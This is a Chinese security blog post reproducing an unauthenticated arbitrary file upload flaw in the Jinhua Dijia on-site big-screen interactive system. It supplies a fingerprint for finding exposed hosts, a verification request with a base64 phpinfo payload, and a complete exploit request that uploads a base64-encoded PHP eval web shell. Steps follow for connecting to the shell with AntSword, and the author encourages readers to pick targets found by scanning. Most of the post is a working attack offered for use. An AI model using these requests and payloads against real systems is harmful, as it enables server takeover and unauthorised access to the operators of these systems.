金华迪加现场大屏互动系统是一种集成了先进技术和创意设计的互动展示解决方案,旨在通过大屏幕和多种交互方式,为观众提供沉浸式的互动体验。该系统广泛应用于各类活动、展览、会议等场合,能够显著提升现场氛围和参与者的体验感。
金华迪加 现场大屏互动系统 mobile.do.php 存在任意 文件上传漏洞Q未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell进-步控制服务器权限。
body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
filetype=php&imgbase64=PD9waHAgcGhwaW5mbygpO3VubGluayhfX0ZJTEVfXyk7Pz4=
回显了完整路径,验证
如果没有真实的环境和深入的手法,我估计你们也很难理解,来吧,小龙带你们整
1、利用poc检测出来之后挑选天选之子
2、然后先验证一波
3、成功验证之后,我们直接尝试拿shell,放入EXP
EXP:
POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
filetype=php&imgbase64=PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=
4、蚁剑尝试连接
蚁剑尝试连接
http://x.x.x.x//data//pic//pic_173055151445329.php
原文始发于微信公众号(暗影网安实验室):【深度复现】金华迪加 现场大屏互动系统任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论